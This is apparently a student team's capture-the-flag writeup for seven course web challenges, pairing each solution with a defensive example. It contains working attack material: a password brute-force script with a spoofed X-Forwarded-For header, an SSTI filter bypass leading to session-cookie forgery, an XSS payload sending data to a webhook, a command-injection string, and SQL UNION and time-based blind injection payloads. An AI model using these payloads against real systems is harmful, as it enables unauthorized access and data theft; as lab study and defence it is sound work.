# Computer Attack and Defense (Attack & Defense) Project 2 Writeup
###### tags: `CTF` `NCU-Attack&Defense` `ADL-Project`
### 1. monster
@Quisette
header:
* x-forwarded-for: 127.0.0.1
* referer: https://www.adlSecurity.com
rockyou is the password database; brute force:
```python=
from base64 import b64encode
import requests

# Headers the challenge checks before it serves /admin
headers = {
    'x-forwarded-for': '127.0.0.1',
    'referer': 'https://www.adlSecurity.com',
}

def basic_auth(username, password):
    token = b64encode(f"{username}:{password}".encode('utf-8')).decode("ascii")
    return f'Basic {token}'

response = requests.request(
    method="GIVEMEFLAG",
    url='http://ctf.adl.tw:12002/',
    headers=headers,
    timeout=2,
)
# print(response.content.decode('utf-8'))

# rockyou.txt is latin-1; resume after line 31616 and only try words starting with "hi"
with open('rockyou.txt', 'r', encoding='latin-1') as file1:
    lines = file1.readlines()

count = 0
for line in lines:
    s = line.strip()
    count += 1
    if count <= 31616:
        continue
    if not s.startswith("hi"):
        continue
    print("{}) try: hitori & {}".format(count, s))
    headers['Authorization'] = basic_auth('hitori', s)
    try:
        response = requests.request(method="GIVEMEFLAG", url='http://ctf.adl.tw:12002/admin', headers=headers, timeout=2)
    except requests.RequestException:
        continue  # network error: skip this candidate instead of re-checking the previous response
    if 'You have not been verified' not in response.text:
        print('Find! ', s)
        break
```
pass: `hitorijanai`
```
ADL{h77p_23qu357_h34d32_m0d1f13d!!!!_https://youtu.be/Gc3NKC8TQtY}
```
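Added example (not from the original writeup): the defender's side of this challenge. The admin gate trusted `x-forwarded-for` from any client; the code below only honours that header when the TCP peer is one of our own proxies, attributes failed logins to the resolved client address, and flags non-standard methods such as the `GIVEMEFLAG` used above. The proxy address, `EXPECTED_METHODS` and the access-log records are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed: the only hosts whose X-Forwarded-For we trust (our own reverse proxies).
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.2")}

# Methods a normal client of this app uses; anything else deserves a look.
EXPECTED_METHODS = {"GET", "HEAD", "POST", "OPTIONS"}


def client_ip(remote_addr, xff_header=None):
    """Resolve the real client address.

    X-Forwarded-For is honoured only when the TCP peer is a trusted proxy, and
    then only its last element (the hop that proxy itself appended). A direct
    client sending 'x-forwarded-for: 127.0.0.1' is therefore ignored.
    """
    peer = ipaddress.ip_address(remote_addr)
    if peer in TRUSTED_PROXIES and xff_header:
        return ipaddress.ip_address(xff_header.split(",")[-1].strip())
    return peer


def is_local_client(remote_addr, xff_header=None):
    """The check the challenge got wrong: 'local' must mean the resolved peer, not a header."""
    return client_ip(remote_addr, xff_header).is_loopback


# Constructed access-log records:
# (unix time, peer IP, X-Forwarded-For, method, path, status, auth user)
ACCESS_LOG = [
    (1700000000, "203.0.113.5", "127.0.0.1", "GIVEMEFLAG", "/admin", 401, "hitori"),
    (1700000001, "203.0.113.5", "127.0.0.1", "GIVEMEFLAG", "/admin", 401, "hitori"),
    (1700000002, "203.0.113.5", "127.0.0.1", "GIVEMEFLAG", "/admin", 401, "hitori"),
    (1700000003, "203.0.113.5", "127.0.0.1", "GIVEMEFLAG", "/admin", 401, "hitori"),
    (1700000004, "203.0.113.5", "127.0.0.1", "GIVEMEFLAG", "/admin", 401, "hitori"),
    (1700000005, "203.0.113.5", "127.0.0.1", "GIVEMEFLAG", "/admin", 401, "hitori"),
    (1700000010, "198.51.100.7", None, "GET", "/", 200, None),
    (1700000011, "198.51.100.7", None, "GET", "/admin", 401, "alice"),
    (1700000300, "198.51.100.7", None, "GET", "/admin", 200, "alice"),
]


def brute_force_sources(log, window=60, threshold=5):
    """Resolved client IPs with at least `threshold` 401s inside any `window` seconds.

    Failures are keyed by the resolved IP, so a spoofed X-Forwarded-For cannot
    spread one attacker's attempts across many fake addresses.
    """
    failures = defaultdict(list)
    for ts, peer, xff, _method, _path, status, _user in log:
        if status == 401:
            failures[str(client_ip(peer, xff))].append(ts)
    flagged = set()
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(ip)
                break
    return flagged


def unexpected_methods(log):
    """HTTP methods seen in the log that are not in EXPECTED_METHODS."""
    return {rec[3] for rec in log if rec[3] not in EXPECTED_METHODS}
```

Run over the constructed log this reports `203.0.113.5` as a brute-force source and `GIVEMEFLAG` as an unexpected method; the spoofed `127.0.0.1` never counts as local because the peer is not a trusted proxy.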
---
### 2. flag_store
`@Gsauce`
Logging in as `admin` first reveals a username hint:

The login page is where the SSTI attack goes.
Attack string: `{{con_fig}}`
Because the filter strips underscores, and `config` is checked before the underscore is removed:
```python
# app.py, line 82
blacklist = ['config', '_', 'os', 'init', '.', 'builtin', 'mro', 'cat', 'id', 'self', 'context', 'function', 'local', 'request', 'session', 'base', 'url_for', 'globals']
```
So after filtering, `{{con_fig}}` becomes `{{config}}`.
Rendered in the Jinja template, this dumps the app config data, which includes the secret key; that key can be used to forge session cookies:
```
'SECRET_KEY': 'ihfoajfdlngalskfnglnsljgaaskdhglmasdlglasdg'
```
Use [`flask-unsign`](https://github.com/Paradoxis/Flask-Unsign) to sign a new session cookie:
```bash
$ flask-unsign --sign --cookie "{'user': '1mv32yv32y21ch'}" --secret 'ihfoajfdlngalskfnglnsljgaaskdhglmasdlglasdg'
```
Cookie: `eyJ1c2VyIjoiMW12MzJ5djMyeTIxY2gifQ.ZXkn2A.6_Keq3lEj9SMEHPWRvqRaQ9asBA`
Putting this cookie into the browser (HTTP request) logs in as `1mv32yv32y21ch`, and the flag can be bought:

Flag: `ADL{17'5_4_21p-0ff!!!!.f149_15_700_3xp3n51v3}`
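Added example (not the challenge's app.py): what the blacklist above does in a single pass, and two ways a defender would change it. The list is the one quoted from app.py; the functions are my own.

```python
# The Flask app's blacklist, as quoted from app.py in the writeup.
BLACKLIST = ['config', '_', 'os', 'init', '.', 'builtin', 'mro', 'cat', 'id',
             'self', 'context', 'function', 'local', 'request', 'session',
             'base', 'url_for', 'globals']


def strip_once(payload):
    """Single pass in list order, the behaviour the writeup relies on: removing
    '_' after 'config' has already been checked re-creates the word 'config'."""
    for word in BLACKLIST:
        payload = payload.replace(word, "")
    return payload


def strip_to_fixpoint(payload, max_rounds=10):
    """Keep stripping until nothing changes, so words rebuilt by an earlier
    removal are caught on the next round. Still a blacklist, so still fragile."""
    for _ in range(max_rounds):
        stripped = strip_once(payload)
        if stripped == payload:
            return stripped
        payload = stripped
    raise ValueError("payload did not converge; refuse it")


def blacklisted_words(payload):
    """Reject, don't rewrite: report every listed word present so the caller
    can refuse the input instead of trying to repair it."""
    return [w for w in BLACKLIST if w in payload]
```

Even the fixpoint variant is the wrong layer: the real fix is never to hand user input to `render_template_string` as the template text, but to render a fixed template and pass the input in as a variable, so it is data rather than Jinja syntax.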
---
### 3. Meow
```python=
import requests
import json
import copy

dest = "http://140.115.59.7:12004/api/"
# r = requests.get(dest)
# print(r.content)

# Start a game; the server returns a session cookie that every later call must carry
r = requests.post(dest + "start")
print(r.content)
eid = r.headers["Set-Cookie"].split(";")[0]
print(eid)

headers = {
    'Accept': '*/*',
    'Accept-Language': 'zh-TW,zh',
    'Cache-Control': 'no-cache',
    'Connection': 'keep-alive',
    'Content-Type': 'application/json',
    'Cookie': eid,
    'Origin': 'http://140.115.59.7:12004',
    'Pragma': 'no-cache',
    'Referer': 'http://140.115.59.7:12004/',
    'Sec-GPC': '1',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
}

def score(payload):
    """Submit a 10x10 grid and return the score the server reports for it."""
    requests.post(dest + "start")
    requests.post(dest + "submit", data=json.dumps(payload), headers=headers, verify=False)
    res = requests.get(dest + "score", headers={'Cookie': eid})
    return json.loads(res.content)['data']['score']

def flag(payload):
    """Same round trip, but read the flag field the server returns for a full score."""
    requests.post(dest + "start")
    requests.post(dest + "submit", data=json.dumps(payload), headers=headers, verify=False)
    res = requests.get(dest + "score", headers={'Cookie': eid})
    return json.loads(res.content)['data']['flag']

# Cell-by-cell hill climb: a cell only scores when it holds the right value (0-3),
# so 4 is a safe "unknown" filler and any score increase means the guess is correct.
old = [[4 for _ in range(10)] for _ in range(10)]  # any value except 0-3
for i in range(10):
    for j in range(10):
        oldscore = score(old)
        for k in [0, 1, 2, 3]:
            test = copy.deepcopy(old)  # copy, so a wrong guess does not stay in the grid
            test[i][j] = k
            newscore = score(test)
            if newscore > oldscore:
                old[i][j] = k
                oldscore = newscore
                print("new", newscore, k)
                break
        if oldscore == 100:
            print(flag(old))
```
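Added example (not the original solver): the same cell-by-cell hill climb run offline against a constructed stand-in for the `/score` oracle, to show why it needs at most 401 queries, next to a pass/fail oracle that gives the search nothing to climb. The hidden grid, the oracle classes and `demo()` are all assumptions of this example.

```python
import copy
import random

N = 10
SYMBOLS = [0, 1, 2, 3]
FILLER = 4  # never a valid symbol, so a grid of FILLERs scores 0


class ScoreOracle:
    """Constructed stand-in for the challenge's /submit + /score round trip:
    returns how many of the 100 cells match a hidden grid, and counts queries."""

    def __init__(self, hidden):
        self.hidden = hidden
        self.queries = 0

    def score(self, grid):
        self.queries += 1
        return sum(grid[i][j] == self.hidden[i][j] for i in range(N) for j in range(N))


class PassFailOracle(ScoreOracle):
    """Hardened variant: only says whether the whole grid is right, so one
    query no longer reveals anything about an individual cell."""

    def score(self, grid):
        self.queries += 1
        return 100 if grid == self.hidden else 0


def greedy_solve(oracle):
    """The writeup's coordinate-wise hill climb. Each cell contributes to the
    score independently, so the first symbol that raises the score is the right
    one and at most len(SYMBOLS) queries per cell are ever needed."""
    grid = [[FILLER] * N for _ in range(N)]
    best = oracle.score(grid)
    for i in range(N):
        for j in range(N):
            for k in SYMBOLS:
                trial = copy.deepcopy(grid)  # copy, so a rejected guess does not stick
                trial[i][j] = k
                s = oracle.score(trial)
                if s > best:
                    grid, best = trial, s
                    break
    return grid, best


def random_hidden(seed=0):
    """Constructed hidden grid, deterministic for the given seed."""
    rng = random.Random(seed)
    return [[rng.choice(SYMBOLS) for _ in range(N)] for _ in range(N)]


def demo(seed=0):
    """Run the climb against the leaky oracle and the pass/fail oracle."""
    hidden = random_hidden(seed)
    leaky = ScoreOracle(hidden)
    grid, best = greedy_solve(leaky)
    strict = PassFailOracle(hidden)
    _, best_strict = greedy_solve(strict)
    return {
        "recovered": grid == hidden,
        "score": best,
        "queries": leaky.queries,
        "strict_score": best_strict,
        "strict_queries": strict.queries,
    }
```

Against the per-cell score the grid is recovered in at most 1 + 4 × 100 queries; against the pass/fail oracle the same 401 queries leave the search at score 0, which is the property a scoring endpoint needs if the answer is meant to stay secret (or, failing that, a hard cap on submissions per session).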
---
### 4. msg-board
reference: https://hackmd.io/@jcxyisncu1111/adctf/%2FMu5KjNvpQW-sl4qHbBMDGQ
<!-- https://owasp.org/www-community/attacks/xss/ -->
The working payload is `<link rel=stylesheet href=87 onerror={script}>`, with the script pointing at a webhook.
Remember to swap in a webhook you generated yourself.
After that you can see the requests the server makes to it.

flag get, nice
```
ADL{51mp1e_R3fl3c7!X55_4774ck}
```
After the message is sent the original page redirects immediately, so save the payload somewhere first QQ
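Added example, not from the original writeup: the board-side fix and a detection check. `render_message` escapes the stored message before it is placed in the HTML body, `suspicious_reasons` flags submissions like the payload above (the webhook host is a placeholder), and `security_headers` returns a CSP that blocks inline handlers and off-site `connect-src`. All sample messages are constructed.

```python
import html
import re

# Constructed sample messages; the last one is the <link ... onerror=...> form
# from the writeup, with the webhook replaced by a placeholder host.
SAMPLE_MESSAGES = [
    "hello board",
    "<b>bold</b> is fine as text",
    "<link rel=stylesheet href=87 onerror=fetch('https://webhook.example.invalid/x')>",
]

EVENT_HANDLER = re.compile(r"<[^>]*\bon[a-z]+\s*=", re.I)
EXTERNAL_URL = re.compile(r"https?://", re.I)


def render_message(msg):
    """Output encoding for an HTML body context: every message becomes inert text."""
    return html.escape(msg, quote=True)


def suspicious_reasons(msg):
    """Detection side: reasons a submitted message deserves review or an alert."""
    reasons = []
    if EVENT_HANDLER.search(msg):
        reasons.append("inline event handler attribute")
    if "<" in msg and EXTERNAL_URL.search(msg):
        reasons.append("markup carrying an external URL")
    return reasons


def scan_board(messages):
    """Map each flagged message to its reasons; clean messages are omitted."""
    return {m: suspicious_reasons(m) for m in messages if suspicious_reasons(m)}


def security_headers():
    """Response headers for the board. The CSP refuses inline handlers and any
    fetch() to a third-party host even if a message ever reaches the page unescaped."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; connect-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }
```

Escaping at output time is the fix; the detector and CSP are defence in depth, because the escaped message is displayed as literal text and the browser never sees a `<link>` element.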
---
### 5. command injection
`@Gsauce`
Use the `ls` command to list the files in the path:

Use `ls -al` to get file details (size):

Attack string:
```
' `grep '' \`find . -type f -size 20c\`` #
```
Inline execution of `find . -type f -size 20c` locates the `./flag` file by its size (since `flag` cannot be typed directly),
and because `cat` is blocked, `grep '' {FILENAME}` is used to print the file contents.
The trailing `#` turns whatever PHP appends after it into a comment.
Backticks (` `` `) in `bash` mean: run the enclosed command and substitute its output.

Flag: `ADL{QQQQQqqqqqQQQQQ}`
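Added example (a Python stand-in, not the challenge's PHP): a version of the `ls` feature that cannot be injected. The name is allowlisted, confined to a base directory and passed to `ls` as one argv element with no shell, so the backticks, quotes and `#` of the string above are never interpreted. `WRITEUP_PAYLOAD` is the string from this section; the directory contents created in `demo()` are constructed.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# The writeup's injection string, kept only as a test input.
WRITEUP_PAYLOAD = "' `grep '' \\`find . -type f -size 20c\\`` #"

SAFE_NAME = re.compile(r"[A-Za-z0-9._-]+")


def name_allowed(name):
    """Allowlist: letters, digits, dot, underscore, dash; '..' is refused outright."""
    return bool(SAFE_NAME.fullmatch(name)) and name != ".."


def list_dir(base, name=".", long=False):
    """Hardened stand-in for the challenge's ls feature (constructed, not the
    challenge's code): allowlisted name, path confined to `base`, and no shell."""
    if not name_allowed(name):
        raise ValueError(f"rejected name: {name!r}")
    base = Path(base).resolve()
    target = (base / name).resolve()
    if target != base and base not in target.parents:
        raise ValueError("path escapes base directory")
    # argv list, shell=False: every element is one literal argument to ls
    argv = ["ls", "-al" if long else "-1", "--", str(target)]
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    return result.stdout


def demo():
    """Create a throwaway directory and compare a legitimate call with the payload."""
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "notes.txt").write_text("twenty bytes or so\n")  # constructed file
        listing = list_dir(tmp, ".")
        try:
            list_dir(tmp, WRITEUP_PAYLOAD)
            payload_rejected = False
        except ValueError:
            payload_rejected = True
    return {"lists_notes": "notes.txt" in listing, "payload_rejected": payload_rejected}
```

Blocking `cat` and the literal word `flag`, as the challenge did, is a denylist and loses to `grep ''` and `find -size`; an allowlist on the argument plus `shell=False` removes the interpreter that made the backticks meaningful.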
---
### 6. sql-injection-1 (not solved)
The old keyword-doubling trick no longer works; find a way around it?
```
' UNISELECTON SELUNIONECT 'idtjohn88', 'a', NULL--
' UNISELECTON SELUNIONECT 'idtjohn88', NULL, 'a'--
' UNISELECTON SELUNIONECT NULL, 'idtjohn88', 'a'--
' UNISELECTON SELUNIONECT 'idtjohn88', 'a', NULL--
' UNISELECTON SELUNIONECT 'idtjohn88', NULL, 'a'--
' UNISELECTON SELUNIONECT NULL, 'idtjohn88', 'a', NULL--
' UUNIONINON SESELECTLECT NULL, 'idtjohn88', 'a'--
```
(wip)
...
`@Gsauce`: Tried scanning for the vulnerability with [`sqlmap`](https://github.com/sqlmapproject/sqlmap), and found that a time-based blind attack works:

Attack strings tested:
```
// 1. This one works
' RLIKE SLEEP(1) -- f
// 2. This one returns a mysqli error message (syntax error)
' RLIKE '*' --f
// 3. Times out
' UNION ...
```
### 6. SQL_Injection1 (second attempt)

> http://140.115.59.7:12005/?source=1

Injection point:
```php
$sql = "SELECT * FROM users WHERE `username` = '$username' AND `password` = '$password';";
```
- DBMS: mysql
- Filter:
```php
$blacklist = array("ununionion", "union", "selselectect", "select", "where", "and", "or");
```
- Hard to stack queries:
```php
$query = mysqli_query($link, $sql);
```
- username = idtjohn88
```php
if ($fetch["username"] === 'idtjohn88' && $fetch["password"] === $password) {
    $loginStatus = True;
    break;
}
```
-> "ununionion" is in the blacklist
payload:
```sql
' UNIUNIONON SELSELECTECT NULL, 'kita0421', 'a'--
' UNIUNIONON SELSELECTECT 'kita0421', NULL, 'a'--
' UNIUNIONON SELSELECTECT 'kita0421', 'a', NULL--
```
### 7. SQL_Injection2
Blind injection payload:
```sql
' OR IF((BINARY SUBSTRING((SELECT `password` from users LIMIT 1 OFFSET 487),63,1)='a'),SLEEP(1),0) --
```
Brute-force the password one character at a time with SLEEP(1)
-> leaks the database contents
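Added example, not from the writeup: why the UNION row shape used in section 6 (NULL, username, password) passes the login loop shown there, and the parameterised query that stops it. It uses an in-memory sqlite table with constructed rows, assumes the doubled keywords have already collapsed to `UNION SELECT` as the writeup expects, and mirrors the PHP check above in `_check_rows`.

```python
import sqlite3

TARGET_USER = "idtjohn88"  # the account the challenge's login check compares against

# Payload shape from the writeup once the doubled keywords collapse to UNION SELECT:
# the injected row carries the expected username and a password we also submit.
UNION_PAYLOAD = "' UNION SELECT NULL, 'idtjohn88', 'a'--"


def make_db():
    """In-memory stand-in for the challenge's MySQL users table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "idtjohn88", "constructed-secret-1"),
                      (2, "kita0421", "constructed-secret-2")])
    return conn


def _check_rows(rows, password):
    """Mirror of the PHP loop: accept when a fetched row has the target
    username and its password column equals what was submitted."""
    for _id, username, pw in rows:
        if username == TARGET_USER and pw == password:
            return True
    return False


def login_vulnerable(conn, username, password):
    """String-built query, as in the challenge. The UNION row passes the check
    because the attacker chose both of the columns that get compared."""
    sql = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
    return _check_rows(conn.execute(sql).fetchall(), password)


def login_safe(conn, username, password):
    """Parameterised query: the whole payload is matched as a literal username,
    so no row comes back. The same change defuses the SLEEP()-based payload of
    section 7, which likewise depends on breaking out of the string literal."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return _check_rows(conn.execute(sql, (username, password)).fetchall(), password)
```

The keyword blacklist in section 6 tries to stop the query text from changing shape; binding parameters makes the shape fixed by construction, so there is nothing left for `UNIUNIONON` or `RLIKE SLEEP(1)` to rewrite.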